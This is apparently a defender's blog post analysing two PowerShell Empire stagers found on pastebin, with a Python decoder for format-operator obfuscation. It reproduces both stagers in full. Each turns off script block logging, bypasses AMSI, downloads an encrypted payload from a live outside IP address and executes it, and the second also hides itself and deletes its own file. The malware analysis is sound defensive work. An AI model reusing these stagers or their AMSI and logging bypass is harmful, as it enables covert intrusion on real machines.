Powershell that looks & smells like Empire Payloads
Today we found the following PowerShell Proof of Concept (PoC) on pastebin.com and immediately recognised it as an Empire payload. The junior analysts in the team were shocked that we could call this out so quickly, so we showed them some key points to consider that allow you to analyse these kinds of PoCs within 30 seconds.
The sample
https://pastebin.com/raw/tTMzK8YG
powershell -noP -sta -w 1 -enc [base64 string omitted]
You can use either of the following commands to decode base64 strings:
Windows:
certutil /decode [base64 infile] [decoded outfile]
Linux:
base64 -d [base64 infile]
or you can choose to use an online platform such as http://gchq.github.io/CyberChef/
Sidenote: when we downloaded this base64 sample onto our Windows 10 sandbox, Windows Defender immediately identified it as PowerMeterpreter.
Base64 decoded Sample
IF($PSVeRSIoNTablE.PSVeRsiON.MaJOr -Ge 3){$GPS=[ReF].ASSEmbly.GetTYpE('System.Management.Automation.Utils')."GetFIe`LD"('cachedGroupPolicySettings','N'+'onPublic,Static').GEtVALuE($nuLl);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ELSe{[ScRiPtBlock]."GEtFIe`ld"('signatures','N'+'onPublic,Static').SetValuE($NUll,(NEW-OBJEct ColLeCtionS.GENERIc.HaSHSET[strIng]))}[REF].AsSemblY.GeTTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SeTValUE($nUlL,$TRuE)};};[SYStEm.Net.SeRVIcEPoINTManaGEr]::EXPECT100COntinUe=0;$wc=NEW-OBjECt SysTEm.Net.WebCLIENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HEaDErs.ADD('User-Agent',$u);$WC.PrOxY=[SYStem.NEt.WEbREquest]::DEfaUltWebProxY;$wc.ProXY.CREDenTIALS = [SYStEm.NET.CreDENtiAlCacHE]::DEfauLTNETwOrkCrEdeNTialS;$Script:Proxy = $wc.Proxy;$K=[SYSTem.TeXT.EnCoDiNg]::ASCII.GETBYTeS('677336487313ca56c25345dfbb645041');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://165.227.157.168:81';$t='/admin/get.php';$wC.HEADeRs.Add("Cookie","session=IuQdVPxX5oe/RvC9D5nZhUdEIMM=");$DAtA=$WC.DoWNLOADData($SeR+$T);$iV=$DatA[0..3];$daTa=$datA[4..$daTa.LENGtH];-joIn[ChAr[]](& $R $DaTa ($IV+$K))|IEX
Looks like Empire, smells like Empire because…
The following pages are very common for Empire listeners:
- /admin/get.php
- /admin/news.php
- /login/process.php
http://165.227.157.168:81/admin/get.php
A simple whois query reveals that the hosting provider is DigitalOcean, a favourite cloud hosting provider for penetration testers and red-teamers:
$ whois 165.227.157.168
NetRange:       165.227.0.0 - 165.227.255.255
CIDR:           165.227.0.0/16
NetName:        DIGITALOCEAN-19
NetHandle:      NET-165-227-0-0-1
NetType:        Direct Allocation
Organization:   DigitalOcean, LLC (DO-13)
Grabbing the HTTP headers reveals another important piece of information: Empire's Server header defaults to Microsoft-IIS/7.5 and its Expires header is 0. See below:
$ nc 165.227.157.168 81
HEAD / HTTP/1.0

200 OK
Content-Type: text/html
Content-Length: 233
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Conclusion
That is how we were able to determine so quickly that this PoC is an Empire payload. What helped us is past experience with the Empire framework: testing and researching its modules against our own systems. An important factor in this example is that the attackers/red-teamers did very little to obfuscate or change the default settings, which made our analysis an easy effort.
Update 2018-01-15: Obfuscate to the Max!!!
Spotted a slightly more obfuscated sample on pastebin: https://pastebin.com/jB4jJFHe
start /b CMd /c “SEt Vdl= ^&(“{0}{1}{2}” -f’Se’,’T-iTE’,’m’) (“vaR”+”Ia”+”BLE:1kzW”) ([TYpe](“{2}{0}{1}” -F ‘PtblOC’,’K’,’SCRi’)) ;.(“{2}{1}{0}”-f’eM’,’T-It’,’se’) (“vAr”+”IaB”+”LE:”+”P”+”3Qk”) ( [TYPe](“{1}{0}” -f’eF’,’R’) ) ; .(“{2}{0}{1}”-f ‘T’,’-ITem’,’sE’) (“vaRiA”+”BL”+”E:K”+”zGw”) ( [TyPe](“{1}{3}{2}{6}{5}{0}{4}{7}” -f ‘pOinTMaN’,’sYS’,’nE’,’TEm.’,’aG’,’.sErViCE’,’T’,’ER’) ) ; $9bX =[tYPE](“{2}{1}{4}{3}{0}” -F ‘BRequesT’,’YstE’,’s’,’net.we’,’m.’) ; .(“{1}{0}”-f ‘eT’,’S’) NujPlG ( [tYpe](“{1}{6}{4}{2}{0}{3}{5}” -f’CreDE’,’SYStE’,’et.’,’NTi’,’.n’,’aLCACHe’,’m’) ) ; $37B9 =[tyPE](“{0}{3}{1}{2}”-F ‘SySTE’,’tEXt.ENc’,’ODING’,’M.’) ;IF(${PsVeRs`iONt`ABLe}.”PsVeR`SI`oN”.”M`AjOr” -gE 3){${G`Ps}= ( .(“{2}{1}{0}” -f ‘TEm’,’I’,’get-’) (‘vARI’+’AB’+’Le:P3qk’) ).ValUE.”a`S`sEMBlY”.(“{0}{2}{1}” -f’GE’,’PE’,’tTY’).Invoke((“{4}{8}{1}{7}{5}{0}{2}{3}{6}” -f ‘Automation.’,’an’,’Uti’,’l’,’Syste’,’nt.’,’s’,’ageme’,’m.M’)).”GEtFiE`lD”((“{0}{7}{3}{1}{4}{6}{2}{5}”-f ‘c’,’p’,’g’,’dGrou’,’Policy’,’s’,’Settin’,’ache’),’N’+(“{3}{1}{0}{2}”-f’ic,’,’nPubl’,’Static’,’o’)).(“{2}{1}{0}”-f ‘E’,’eTValU’,’G’).Invoke(${Nu`LL});IF(${g`Ps}[(“{0}{2}{1}” -f ‘Sc’,’tB’,’rip’)+(“{1}{3}{2}{0}” -f’g’,’lockL’,’ggin’,’o’)]){${G`PS}[(“{1}{0}” -f ‘ptB’,’Scri’)+(“{2}{1}{0}” -f ‘ng’,’Loggi’,’lock’)][(“{3}{2}{1}{0}”-f’B’,’Script’,’le’,’Enab’)+(“{1}{0}{2}”-f ‘ckLoggin’,’lo’,’g’)]=0;${G`ps}[(“{0}{1}{2}”-f ‘S’,’crip’,’tB’)+(“{0}{3}{1}{2}”-f ‘l’,’ckLoggin’,’g’,’o’)][(“{5}{1}{3}{4}{2}{0}” -f ‘g’,’n’,’ggin’,’ableScriptBl’,’ockInvocationLo’,’E’)]=0}ElsE{ ( .(“{2}{0}{1}” -f ‘-i’,’Tem’,’geT’) (“VaR”+”Ia”+”bLe:1kzW”) ).vaLuE.”GetFIE`lD”((“{2}{1}{0}”-f ‘es’,’r’,’signatu’),’N’+(“{0}{3}{2}{1}”-f’on’,’ic,Static’,’bl’,’Pu’)).”sE`TvAlue”(${Nu`lL},(.(“{1}{0}{2}” -f’eW’,’N’,’-Object’) (“{6}{8}{7}{0}{1}{3}{9}{5}{4}{2}” -f ‘cTi’,’oNS.GeNE’,’]’,’R’,’hSet[StRIng’,’S’,’CO’,’e’,’LL’,’ic.HA’)))} $P3QK.”A`SsE`MBlY”.(“{0}{1}{2}” -f ‘Ge’,’T’,’TyPe’).Invoke((“{6}{9}{5}{7}{10}{4}{3}{1}{8}{0}{2}” -f 
‘ms’,’i’,’iUtils’,’mat’,’.Auto’,’st’,’S’,’em.Manageme’,’on.A’,’y’,’nt’))^|.(‘?’){${_}}^|.(‘%’){${_}.(“{0}{2}{1}” -f’G’,’FIELD’,’et’).Invoke((“{0}{2}{1}” -f ‘a’,’nitFailed’,’msiI’),(“{2}{0}{1}{3}”-f’c,S’,’tat’,’NonPubli’,’ic’)).(“{0}{1}”-f’SeTV’,’ALUE’).Invoke(${N`ULl},${T`RUe})};}; $kZgW::”E`x`pEct100cO`N`TInUE”=0;${wc}=^&(“{0}{1}{2}” -f ‘NE’,’W’,’-ObJECt’) (“{1}{0}{3}{4}{2}”-f’yst’,’S’,’t’,’Em.NET.WebCLIe’,’n’);${U}=(“{12}{6}{8}{2}{14}{1}{7}{10}{15}{0}{9}{5}{4}{16}{3}{11}{13}”-f ‘1; WOW64; Trident/’,’i’,’la’,’ G’,’ rv’,’.0;’,’z’,’n’,’il’,’7',’dows NT ‘,’e’,’Mo’,’cko’,’/5.0 (W’,’6.’,’:11.0) like’);${wc}.”HEa`De`Rs”.(“{0}{1}” -f’Ad’,’D’).Invoke((“{1}{2}{0}{3}” -f ‘en’,’User’,’-Ag’,’t’),${u});${wc}.”pro`XY”= ( ^&(“{1}{0}” -f ‘Et-ItEm’,’g’) VaRiabLe:9Bx).vaLUe::”D`E`FaUltWebPR`o`XY”;${wc}.”P`ROxy”.”Credent`i`ALs” = (.(“{3}{2}{1}{0}” -f’tEM’,’ildI’,’T-Ch’,’GE’) VARiABLE:nujPlG ).valUE::”De`FA`UlT`NETwoRkC`RE`deNt`IALS”;${SCrIp`T`:p`RoXy} = ${W`c}.”p`ROXy”;${k}= ( ^&(“{2}{0}{1}” -f ‘-VARIa’,’blE’,’GET’) (‘3’+’7b9') -VALueonly )::”As`CII”.(“{2}{0}{1}” -f’eT’,’BYtEs’,’G’).Invoke(‘SFE)[Uf#GWB^<]{m=/thRxp;46YHbavn~’);${R}={${d},${K}=${ar`GS};${s}=0..255;0..255^|.(‘%’){${J}=(${j}+${S}[${_}]+${k}[${_}%${K}.”C`OUNt”])%256;${S}[${_}],${s}[${J}]=${s}[${J}],${S}[${_}]};${D}^|.(‘%’){${i}=(${I}+1)%256;${H}=(${H}+${S}[${I}])%256;${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];${_}-BXOR${S}[(${s}[${i}]+${S}[${H}])%256]}};${s`er}=(“{5}{3}{2}{4}{6}{1}{0}” -f’4445',’.59.85:’,’/1',’:/’,’94.6',’http’,’8');${t}=(“{2}{1}{3}{0}{4}{5}” -f ‘c’,’login’,’/’,’/pro’,’ess.ph’,’p’);${Wc}.”h`e`ADERS”.(“{1}{0}” -f’DD’,’A’).Invoke((“{2}{0}{1}” -f ‘o’,’okie’,’C’),(“{4}{8}{0}{5}{7}{2}{6}{3}{9}{1}” -f’=Q76eu’,’RirqkGw=’,’v’,’E’,’sessi’,’tS’,’2nZ5',’DW’,’on’,’m8DJE’));${da`TA}=${WC}.(“{0}{1}{2}”-f’DoWnlO’,’adDa’,’TA’).Invoke(${S`eR}+${t});${Iv}=${Da`TA}[0..3];${D`ATa}=${d`Ata}[4..${D`Ata}.”leN`GTh”];-jOIn[ChAR[]](^& ${r} ${da`TA} (${I`V}+${K}))^|.(“{1}{0}”-f’EX’,’I’)&& sEt avx=eCho iNvOKE-EXpreSsioN (ITEM 
env:vDl).VaLue ^| POweRSHElL -NOPROFiLE -NOe -NOninTErAc -wiNd hIdDEn -execu BYpASS -&& CMd /c%avX%” start /b “” cmd /c del “%~f0”&exit /b
To decode this sample, the numbers in braces are positional placeholders for the strings that follow PowerShell's -f (format) operator: each {n} is replaced by the nth string, counting from 0. E.g.
"{5}{3}{2}{4}{6}{1}{0}" -f '4445','.59.85:','/1',':/','94.6','http','8'
Becomes:
- http://194.68.59.85:4445
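A decoder for this format-operator trick, written as an added Python example for this post (not from the sample's author or the Empire project). It parses "{n}{m}…" -f 'a','b' expressions the way the second sample uses them, assumes the operands are always single-quoted literals, and runs over a constructed fragment written with straight quotes; it also goes slightly beyond the single expression above by rewriting every such expression in a script in place.

```python
import re

# Constructed fragment in the style of the second sample (straight quotes, three
# format-operator expressions); not the pastebin text itself.
SAMPLE = (
    "${s`er}=(\"{5}{3}{2}{4}{6}{1}{0}\" -f'4445','.59.85:','/1',':/','94.6','http','8');"
    "${t}=(\"{2}{1}{3}{0}{4}{5}\" -f 'c','login','/','/pro','ess.ph','p');"
    ".(\"{2}{1}{0}\"-f'eM','T-It','se') ('vaR'+'Ia'+'BLE:1kzW')"
)

# "{n}{m}..." -f 'a','b',...  : a template of numbered placeholders followed by the
# operands. The sample only ever uses single-quoted literals, so that is all we parse.
FMT_EXPR = re.compile(
    r'''"((?:\{\d+\})+)"\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)''',
    re.IGNORECASE,
)

def resolve_format(template: str, operand_list: str) -> str:
    """Put each operand at the slot its index names: {5}{3}... -> operands[5]+operands[3]+..."""
    operands = re.findall(r"'([^']*)'", operand_list)
    order = [int(i) for i in re.findall(r"\{(\d+)\}", template)]
    if max(order) >= len(operands):
        raise ValueError("placeholder index beyond operand count (truncated sample?)")
    return "".join(operands[i] for i in order)

def deobfuscate(script: str) -> str:
    """Replace every format-operator expression with the literal it builds and
    leave everything else untouched, so listener URLs and cmdlet names read plainly."""
    return FMT_EXPR.sub(lambda m: "'" + resolve_format(m.group(1), m.group(2)) + "'", script)

def extract_strings(script: str) -> list:
    """Just the rebuilt literals, in order of appearance."""
    return [resolve_format(t, ops) for t, ops in FMT_EXPR.findall(script)]
```

On the fragment, extract_strings returns the listener URL, the /login/process.php staging path and the split cmdlet name seT-IteM; the remaining 'vaR'+'Ia'+'BLE:...' concatenations are a separate trick this block does not touch.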